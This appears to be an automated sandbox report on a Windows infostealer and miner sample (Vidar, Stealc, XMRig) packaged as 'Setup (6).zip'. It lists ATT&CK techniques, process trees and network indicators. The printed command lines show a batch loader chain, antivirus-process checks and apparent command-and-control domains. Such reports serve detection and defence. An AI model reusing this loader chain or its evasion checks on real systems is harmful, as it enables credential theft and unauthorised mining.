Malware Analysis Report

2024-09-11 16:31

Sample ID 240614-p42c7a1fng
Target Setup (6).zip
SHA256 03a0f1b34e5688e65e394ac4e242b5e287817afd351d973bcb495d533166568e
Tags
stealc vidar discovery spyware stealer xmrig execution miner upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

03a0f1b34e5688e65e394ac4e242b5e287817afd351d973bcb495d533166568e

Threat Level: Known bad

The file Setup (6).zip was found to be: Known bad.

Malicious Activity Summary

stealc vidar discovery spyware stealer xmrig execution miner upx

Suspicious use of NtCreateUserProcessOtherParentProcess

Vidar

xmrig

Stealc

Detect Vidar Stealer

XMRig Miner payload

Blocklisted process makes network request

Reads data files stored by FTP clients

Reads user/profile data of local email clients

Checks computer location settings

Executes dropped EXE

UPX packed file

Reads user/profile data of web browsers

Loads dropped DLL

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Drops file in Windows directory

Command and Scripting Interpreter: PowerShell

Unsigned PE

Enumerates physical storage devices

Suspicious use of SendNotifyMessage

Suspicious behavior: MapViewOfSection

Enumerates processes with tasklist

Checks processor information in registry

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Command and Scripting Interpreter
T1059
PowerShell
T1059.001
Persistence
TA0003
Privilege Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Unsecured Credentials
T1552
Credentials In Files
T1552.001
Discovery
TA0007
Query Registry
T1012
System Information Discovery
T1082
Process Discovery
T1057
Lateral Movement
TA0008
Collection
TA0009
Data from Local System
T1005
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-14 12:54

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-14 12:53

Reported

2024-06-14 12:57

Platform

win10v2004-20240226-en

Max time kernel

118s

Max time network

140s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1108 created 3268 N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif C:\Windows\Explorer.EXE

Vidar

stealer vidar

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Setup (6).exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1108 set thread context of 2908 N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4056 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\Setup (6).exe C:\Windows\SysWOW64\cmd.exe
PID 4056 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\Setup (6).exe C:\Windows\SysWOW64\cmd.exe
PID 4056 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\Setup (6).exe C:\Windows\SysWOW64\cmd.exe
PID 1356 wrote to memory of 3008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1356 wrote to memory of 3008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1356 wrote to memory of 3008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1356 wrote to memory of 4592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1356 wrote to memory of 4592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1356 wrote to memory of 4592 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1356 wrote to memory of 4908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1356 wrote to memory of 4908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1356 wrote to memory of 4908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1356 wrote to memory of 3804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1356 wrote to memory of 3804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1356 wrote to memory of 3804 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1356 wrote to memory of 3732 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1356 wrote to memory of 3732 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1356 wrote to memory of 3732 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1356 wrote to memory of 4724 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1356 wrote to memory of 4724 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1356 wrote to memory of 4724 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1356 wrote to memory of 2164 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1356 wrote to memory of 2164 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1356 wrote to memory of 2164 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1356 wrote to memory of 1108 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif
PID 1356 wrote to memory of 1108 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif
PID 1356 wrote to memory of 1108 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif
PID 1356 wrote to memory of 2440 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1356 wrote to memory of 2440 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1356 wrote to memory of 2440 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1108 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif
PID 1108 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif
PID 1108 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif
PID 1108 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif
PID 1108 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\Setup (6).exe

"C:\Users\Admin\AppData\Local\Temp\Setup (6).exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Northeast Northeast.cmd & Northeast.cmd & exit

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 328159

C:\Windows\SysWOW64\findstr.exe

findstr /V "EnclosedVisibilityDuringBrilliant" Peter

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Urge 328159\g

C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif

328159\Prototype.pif 328159\g

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4020 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8

C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif

C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2292 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:3

C:\ProgramData\HDGHJEBFBF.exe

"C:\ProgramData\HDGHJEBFBF.exe"

C:\ProgramData\BGIJJKKJJD.exe

"C:\ProgramData\BGIJJKKJJD.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 13.107.246.64:443 tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 HHdFGUjAaebMiQpHnNQPUq.HHdFGUjAaebMiQpHnNQPUq udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 theemir.xyz udp
US 104.21.81.243:443 theemir.xyz tcp
US 8.8.8.8:53 243.81.21.104.in-addr.arpa udp
US 8.8.8.8:53 c.pki.goog udp
GB 172.217.169.67:80 c.pki.goog tcp
US 104.21.81.243:443 theemir.xyz tcp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 8.8.8.8:53 businessdownloads.ltd udp
US 172.67.212.123:443 businessdownloads.ltd tcp
US 104.21.81.243:443 theemir.xyz tcp
US 8.8.8.8:53 i.imgur.com udp
US 199.232.192.193:443 i.imgur.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\Northeast

MD5 b45202591b60b052447886eb104577f0
SHA1 afa16d62ffd59c86e63e8dd3060baf34a57e7cf1
SHA256 997fc2668f5943d35d2b435e4270a2576b2ef275710f885066a25cc9cd1213e0
SHA512 9d0496c339dfa022115959cbe86ede08ee7f8f97bae31aa5b2e4af63768e4032b526745197bcce5104c2de983f58a9932827481b76c09addade6074c89f14775

C:\Users\Admin\AppData\Local\Temp\Peter

MD5 8bf9404a2322b0a2bcd19382cf90ebc2
SHA1 ac84d7e0ef6aedeb925b53dbd10a085be6760cec
SHA256 1d04056759eef1c0e886bde0d53277f2e248e1f3158f08158151ed27a74efcdc
SHA512 6df401889e198484dfbf03e94eb408fea6dcb3cf9470457f42c16795d4660f906ecbcbcde2ec0c44f3261a839b9137e6050035d656236f5f9164b3239ba881a8

C:\Users\Admin\AppData\Local\Temp\Showers

MD5 de37f7dfee32a6745cad440181cc795e
SHA1 69bd1675df2b06946e0d5da452b5c0d808e76ebd
SHA256 1692192f6fbe9a0757027029c9773196ec6bfb53781336a9164e66510b9de5cc
SHA512 a6a44be54cc0c00904a058808237700a223d78254e6ef1c844f6beb66ec5d17955a47757f8cb039571c7b1da213f5c39e5be54112bb6a772bdcce4e1403376ae

C:\Users\Admin\AppData\Local\Temp\Donor

MD5 165c9fef67a01106cb4a15a8f73ff06e
SHA1 94b530edfc27c9010871d96c4eccd1c3e0708c9f
SHA256 a69c145a5b5b20eb93b7d82e9440d7a0beba53072b83ecc4cddb9e2137a9fe96
SHA512 0648396ae2e4cc86db49b2e3980affa69ddf4b0b607ac5aa80c0611b3df5dac415653a94486cb2eb05d00a1eed680b547d58f489d62f6a2d19f0d910e2a82f42

C:\Users\Admin\AppData\Local\Temp\Johnston

MD5 103d119aa8a89d75d8d087599c321fe9
SHA1 f38f558952f028f3b64b758d2a6570d09d25eb5f
SHA256 d85b39bc6ef094b7a7d4247b5eacb44f1f32ea887614324f5fa882ff61f0bbcf
SHA512 32dddd0981a9ce9404ecd1224fd57e5f65e4110946d21c911ef5e726d285a398ba4e1b86b1f95511edf55689ff80a21804724593e44a1646e248b694d6c54be6

C:\Users\Admin\AppData\Local\Temp\Piss

MD5 93131f960f434fa2c6ed8310b80c952c
SHA1 c5fb6e077d03598457031585793381ae1abab8df
SHA256 c1376889ec8b5cd3e710146be003a3ff51940d6a7e1cb943b8c5c04a7da98e40
SHA512 ed67a586f73b5f1773f5b312436275a30fc26c936f368926ee295c0508f7bc02d34b5c049f6a51d2f6937fd7b4341680038bd0a2f1d03a7a07a404ef58244cbb

C:\Users\Admin\AppData\Local\Temp\Eleven

MD5 b8e5f0ae5af9b75bf009885a32a042cc
SHA1 88c1820f1ba8065871ffdc250a8a0463887dddb8
SHA256 2e83d333c7566963ce675a32b42a6c4b99a907ca2c34c1a8213730e4ad461a24
SHA512 b1b699f38efe9e5794325aeed1758e0492eff6c5e8539412d66e185ab1d2b1cdb2301210278e7658b25dd04d70b13c010d1f92d8476e34d23b9efa5983851005

C:\Users\Admin\AppData\Local\Temp\Brass

MD5 cfbeb50abeb4b45cae9a85881deafdeb
SHA1 a2679acd6055a0bf07fc34a38cf92df1d8b47bcb
SHA256 93406ff30fe7c1a9f8300d4ed6097b15515fa2b421f09b32e9c3b44f71d85b10
SHA512 f46734ab6e917a213a5083f69a5f41b823bc0687b6f77e84cb1016183c74c1af0331c431b9655fc368cb4bfaec16a7284cdcc4f3be2880306f7aadfcef5739f8

C:\Users\Admin\AppData\Local\Temp\Thong

MD5 e85daf9e828a54404f20e99b13b50fb1
SHA1 c4596f5531659d2d985ab07f8a83b5bf7046c7ad
SHA256 02ae86086ce07d7fa62afb52a7cb300b7aab300293740a218427245fe249a16c
SHA512 8eca39efccbe97fad55665c48f39ddb0b1fb3f8d25daaf076b36fb5f01f925752150ac2e15939f82b9987f88859148aa425850a581018fbb2283bbf6f752f0d2

C:\Users\Admin\AppData\Local\Temp\Accredited

MD5 5fe6dff8f4824b74d5b55b91234d2ad2
SHA1 4ff5c6aa348c63720a951cf2ae797786b7f7d53b
SHA256 d8b24570072e032030d6f4dcf403e056a33334eb1c77e7497a46dffbac44338e
SHA512 0f18eacd293524086086ecd8a06c387ffdcfa14bf613637bf33ceaf6071b7dfecf03d803a038271c7271bdecf42979358fb0d99b5141d83cc5d2e1c603a11173

C:\Users\Admin\AppData\Local\Temp\Verify

MD5 d2c6e84f2b8208dcef9027b697736a87
SHA1 23807b3fdfa56512273b22677ed1742ca1d97f67
SHA256 28b9354f9812c980d345d9fca164458e5745c2f41b03fc17f26f5c9070ae4ab2
SHA512 f12efe8547372048f5a4e6ab1b17eb2c0c7edb5e6d2c7a494e80a90b800f0e365555f7e9ef84950ae3807abf8179f13d718885f349198c1f7ac26bb9cc62de29

C:\Users\Admin\AppData\Local\Temp\Rivers

MD5 fbc978cdd7879bb3177a5951b9ebc202
SHA1 a79984bfe14dbbcf273caac437e4ff853085cb94
SHA256 a48c0359f7a95e765b0759998d444bcf05848df6d70d49f216d73ad24520e9ed
SHA512 8f7e1cb2f65b94f1d35796b7845208566b0e7c685f53cdb3c67373871b906cdc4cc58043ac51073ceea335c7c0db155a91a0fff380adde8066cd39e3248e747c

C:\Users\Admin\AppData\Local\Temp\Monetary

MD5 fb207dd3daae6d70329b147cd27629f8
SHA1 31b24557f3a38fc2a6fac2356b9c84560f5a7eb4
SHA256 55e4055a761f6de72b67f65a7a9ef4aa904be7dbbd414dadfa1c2924f1f1c73d
SHA512 d615075db7f6b5019f04a78c7b8fcc090176821e5280be486cb5bc464fd7640db7c5ed3dfb9bbd807ac31b165945b7d49b4cc6fc0fce712f5f290c4b70f056e5

C:\Users\Admin\AppData\Local\Temp\Trials

MD5 b61d86bf3beffab4d100c221f8b5d505
SHA1 7aaf57112aaddb0e6bda53e9881f88806917b44d
SHA256 544daa4eebc82abd4e6de0db4d74eaac30674206bb24249dad032a5440a9ed0c
SHA512 d0a40173e2df3569aaf25b5747b583651ef2c0eb54e0be79e71244cf9e7fecfa705f835d7dea2c97f2cb9f9523f9f8712f7b60ad1cd0a0dd43ae4dcac010e6fd

C:\Users\Admin\AppData\Local\Temp\Min

MD5 84b5cbc02b6784b589a1e732fab2eb11
SHA1 047cf1a36b734bdd2dd6c6be37e31c57eb801bed
SHA256 99a173e0ef78baefcf23c7e91d3420bd337d3cbd6f5438247108f99bdbca2314
SHA512 cae10222a0aad3771afd4d048d975fc7e187fc470bdb0cb1eba96eb8a7e4a6b03a00ad5ff1a8fcd0ff07ac3232fbdd8f0f28076b3d61950218ebfac8991e019b

C:\Users\Admin\AppData\Local\Temp\Costs

MD5 e2da627e46f2a55408826eb2594fb43b
SHA1 c19e0b76395ef2925773aebc0a50a321767969f9
SHA256 ebb816fcde52ecfa80be03363350a879aa8d01a894ab4a920fe77185e74e561c
SHA512 5329a74fe6b7f76742fda2cb83d26fc7201da7cf8e473a4124c5976351d3df520ab001f8caeef809f6f16314ad722bd0329470745b5f7bee436235f682639556

C:\Users\Admin\AppData\Local\Temp\Level

MD5 a4dadb8a544a089b4aee4a5748aaf235
SHA1 0104d996bec6261067d544dc3350e00708be80bf
SHA256 9ea4dba08ff6119c3f8615527df474e335d54c07c010498eb9b4490e5a9e5c2c
SHA512 63ba6ea32f27bfcbb698e10d8709a841046a72a2bf78f26ea8d3a4b862dfd3aee1d416cec22b5c79b34a2c2bb5e5f2da1020889f1c9b6143f0a4f9bf6e9af71e

C:\Users\Admin\AppData\Local\Temp\Spirit

MD5 45b7c6db4c4212296c0f409e050f497f
SHA1 085ac7a8e2a695186cfe5c43a3e6db58588f91ce
SHA256 f55b826fa11826340d240a7df59c94c3ae34bc2b209a54ec6c19757ae8b0f1a2
SHA512 65ddef8c13450a27cb55ab4fde8da3b5526547f704950bd85c3854d223ab22624e5d11c08750baa5e603a9ef7254fdd6a9209548dbba824577c8b4ab6d304c0d

C:\Users\Admin\AppData\Local\Temp\Beach

MD5 5941c44b1fc2813ab474e88e9106c241
SHA1 a328363081d9ffd7e14413ed7cd7af75b3d42368
SHA256 661b5c7db73b2a3e8b9a20e7b54d26b73b8a3463b9387d8675d399fd1a8d8bad
SHA512 19b0d470bcb7b19ad589231f6d03db62eef4e66b3eb8d0d87a4c1dce20bad8f404ecb703250f55e8bfdc1429d59008524a5f687c47e36504b68fd70a281cb427

C:\Users\Admin\AppData\Local\Temp\Penguin

MD5 888388580b16210569adcef464f2327e
SHA1 3c98fa3319589c23e26e11b078072ebaa5de1b76
SHA256 b6903261df9e0ea6aa198c7e7b41472057fe22d751588c115ec938d3e42dfc13
SHA512 288ccbac5cc5db5127a9d280ca4771e136396a98a1ac0ce601ac2e688a15e00507f00db84689a99ee1a649ec0774eeb4b522374c41b8983a8a7bdf2c3089e2f1

C:\Users\Admin\AppData\Local\Temp\Connections

MD5 1bf949f7fd95cff659a03139086f7d87
SHA1 b712712a2944c32875c48d010a3301188ba90d14
SHA256 7d8ad83805f6d996e0dd9fd6f41c4f4195049dc1dbc836a0c524e68685e8cb49
SHA512 a66c1abad745ae88b1a94d94c2a4a1e7a37985d19fe9d36efdc9ec1aaa2883a5409c91c0b37c901864d72ae616da86cfdabedfb0ccfa695804fc0715d1ac5130

C:\Users\Admin\AppData\Local\Temp\Broker

MD5 4a73cbddfd3263424187b29dd0356182
SHA1 c14e63ee586e70134fa24432b6d3966ff483b78a
SHA256 6090a3dc60ec7a84c1c946c62c024b422c6bd116fd15d763e9fe59072b838627
SHA512 ff03ffe59016a8f1b08c0fca64a29a748034d4f5933e36b1e5d359a9b60e5499f2575ce9e1bccf80dd368c20c4f38fbd3f3425c1ef799dd993076c67fa0e32e8

C:\Users\Admin\AppData\Local\Temp\Ali

MD5 716407bf663adacaef5d04814488026c
SHA1 12499ea9481fb26bc58ab34f1295d83d5855b424
SHA256 04f0ca51092b541a82289d054ada19e52c40da4434b827f03b6b7b70766abc30
SHA512 84bcd384bbd5dd4535015e82a1ed799135d86633ccfebad36f0f399e2e1b02c140259e223d18c81e6b4bb8d1f774b7b03d7e30acb2ec6727b39de79363d8e98a

C:\Users\Admin\AppData\Local\Temp\Volleyball

MD5 24e47a1999e17f9f0f259fcdacd4df25
SHA1 ed7c655c0c386eb7dd63613a1004b9425e2d7977
SHA256 ba73de3122a0bf1c500b19be79793b7fe18a28db957524e6e85f48953f453007
SHA512 63066255479c7cd33bdae5571eb27c608580290a14fa5804f78748dd4d0f787794009cd085f3f30b4f9e068e233a1939390f1ed0550e4bd8d28d9a2b4e09f8ea

C:\Users\Admin\AppData\Local\Temp\Miss

MD5 0829f71740aab1ab98b33eae21dee122
SHA1 0631457264ff7f8d5fb1edc2c0211992a67c73e6
SHA256 9f1dcbc35c350d6027f98be0f5c8b43b42ca52b7604459c0c42be3aa88913d47
SHA512 18790c279e0ca614c2b57a215fecc23a6c3d2d308ce77f314378cb2d1b0f413acd3a9cd353aa6da86ec9f51916925c7210f7dfabc0ef726779f8d44f227f03b1

C:\Users\Admin\AppData\Local\Temp\Initiative

MD5 68d718bc0a5b98e7003a1ee5dafe1210
SHA1 6b0c348a4ae6e734de65a05649ec18e9ba183e7d
SHA256 15f7faefcd8d2c2aceaf1da0f3b8b5ac7db4d868eced2b999ccc42bb579f83c4
SHA512 086873e11b7083afc236aba4d817b638f40df25b5bc4af50963d0fc01808735c60b54d6cbb56e11624cc61309ae95b0ccf906a487051f98150fef0fbf75c7252

C:\Users\Admin\AppData\Local\Temp\Mauritius

MD5 ba27e2d8c8494f275c741457bc15f533
SHA1 42468740d544b6785068d47f4587b36109b6f519
SHA256 1beb1b2c2af505ac359cf66ee6895b645480238bd5f40cee072fc85b0019f24d
SHA512 96f48e59f26b89564269265a3acd29ba5645ffdbe153e3c4fbaad84785bd97ede9a49931d0c3ae909fc27e18e680bf7f879ad5332183e706ce58f1da79300aa6

C:\Users\Admin\AppData\Local\Temp\Camel

MD5 7d82d3900c8ba40cf122071c37f0cf9c
SHA1 0008970f1a960a8fdfe55b678a5f9b45048f8e0e
SHA256 af9abccf8d3abc3abb9820f19e7aa6bd603d1f47ce5a7aba58a2b5e5e55ed7cf
SHA512 efd0d18903d1cfb9d1bd3b6103924a743bd8da38c2e00a9367f079ea5140f5df6b82d424aa2129e0e095bc48eaf038f89d90db23fb914723ca9b4cfce48a5a87

C:\Users\Admin\AppData\Local\Temp\Salvador

MD5 c9bdd9c82c3ed58946eba402b537c847
SHA1 9564a227f3950a0898437476c224886579369678
SHA256 600d9d7edda40ee5bf3c6bee9987b2c288f547c33637ef72a23a831708f4dfdb
SHA512 ff40cc3cc18364bbf7bdde8f525b7bc23e669513c743d8acf58b45671c119aca279a554727c1e200cc146ea90ffe19330a65bb992065c820520bafd475a0a6fa

C:\Users\Admin\AppData\Local\Temp\Al

MD5 2332eef605c2bf44201d0f839155b887
SHA1 bb92bc1b42b4d1799c0c7f551a04137ffa280c69
SHA256 521a256a47610774a9eb2fa85441789d7e595ca9f662e074042ec9df12fa66f3
SHA512 388fe1ea427cf3c4b3b85e22ae8e6bf034f457682fba6b0ab82a113a2589754d1b1d8d6fbddd70f79f007036b3bc7750c89d190fc96ff70dd3ce4f97724e47aa

C:\Users\Admin\AppData\Local\Temp\Urge

MD5 b4164811733d945f464aded1dcd862fa
SHA1 238bfcc1dca54e80ababa6676d21bf12894ecba5
SHA256 755f1572c8f0e5e9ef789774dace4faae388fbd4380c5f99d5f073009fdbed01
SHA512 d4ab05cdedc215e6185b7b959e1951011346345071c69f3237c2fd0a0eefd4e8c0a792538b5d1e2a5ab8e8c2598ace162ed66be0bb94f10de7aa49790facc727

C:\Users\Admin\AppData\Local\Temp\328159\Prototype.pif

MD5 b06e67f9767e5023892d9698703ad098
SHA1 acc07666f4c1d4461d3e1c263cf6a194a8dd1544
